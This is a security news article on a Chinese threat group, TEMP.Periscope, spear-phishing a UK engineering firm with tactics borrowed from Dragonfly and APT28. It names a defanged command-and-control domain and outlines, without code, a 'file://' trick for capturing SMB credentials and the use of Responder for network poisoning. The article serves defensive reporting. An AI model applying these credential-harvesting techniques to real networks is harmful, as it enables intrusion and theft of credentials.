Chinese hackers have targeted a UK-based engineering company using technology and tactics from Russian threat groups Dragonfly and APT28, according to security researchers.
In a blog post, researchers from Recorded Future said that the hackers were using the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections.
In this instance, employees of a UK-based engineering company were among the targeted victims of a spear-phishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights and Chinese development.
"We believe TEMP.Periscope reused published TTPs either to increase the group’s chances of success in gaining access to the victim network or to evade attribution by laying false flags to confuse researchers," the company's Insikt Group said.
Researchers said that the hackers likely used a command and control (C2) domain, scsnewstoday[.]com, that was identified in a recent TEMP.Periscope campaign targeting the Cambodian government. The attackers used a Chinese email client, Foxmail, to send the spear-phishing attack.
They noted that a unique technique documented as a Dragonfly TTP in targeting critical infrastructure was used in the attack. The technique attempts to acquire SMB credentials using a "file://" path in the spearphish calling out to a malicious C2 domain.
The attack probably made use of a version of the open source tool Responder as an NBT-NS poisoner. APT28 used Responder in attacks against travellers staying at hotels in 2017.
The UK engineering company was previously targeted by TEMP.Periscope in a May 2017 campaign with the same C2 infrastructure that was used in targeting US engineering and academic entities later in September 2017, as detailed in Proofpoint’s Leviathan report.
"Recorded Future expects TEMP.Periscope to continue to target organisations in the high-tech defence and engineering sectors," researchers said.
"The Chinese strategic requirement to develop advanced technology, particularly in marine engineering, remains an intense focus as China looks to dominate the South China Sea territory."
"We believe TEMP.Periscope will continue to use commodity malware because it is still broadly successful and relatively low cost for them to use. They will continue to observe 'trending' vulnerabilities to exploit and use techniques that have been publicly reported in order to gain access to victim networks."
Researchers said that organisations should configure intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defence mechanisms in place to alert on — and upon review, consider blocking illicit connection attempts from — the external IP addresses and domains listed in the blog post.
Organisations should also monitor and restrict SMB traffic across their networks, particularly external attempts to authenticate via SMB.
Gregory Webb, CEO at Bromium, told SC Media UK that the platform criminality model is productising malware and making cyber-crime as easy as shopping online.
"Not only is it easy to access cyber-criminal tools, services and expertise: it means enterprises and governments alike are going to see more sophisticated, costly and disruptive attacks as the ‘web of profit’ continues to gain momentum. We can’t solve this problem using old thinking or outmoded technology. It’s time for new approaches," he said.
"We have to understand and tackle the underlying economic ecosystem that enables, funds and supports criminal activity on a global scale to stem the tide and better protect ourselves. By better understanding the systems that support cyber-crime, the security community can better understand how to disrupt and stop them."
Tom Van de Wiele, principal security consultant at F-Secure, told SC Media UK that top among the reasons nation states use each other’s attacks is because they work. Then there’s efficiencies to be gained – preparing attack scenarios and making sure infrastructure and tooling is in place takes time and money for attackers.
"Some of the tooling is available for the highest bidder on the black market and there is a whole food chain of people making only certain parts of the tooling or infrastructure, eg droppers, C2 infrastructure, hosting of malware, rogue certificates, etc. If attackers can steal from each other to bring down the cost and be more effective, then that is what they will do. Add to that the fact it provides plausible deniability – or at least the capability to muddy the waters even more when it comes to attribution – then you’ll see that stealing attacks and methods is just part of the MO of attackers," he said.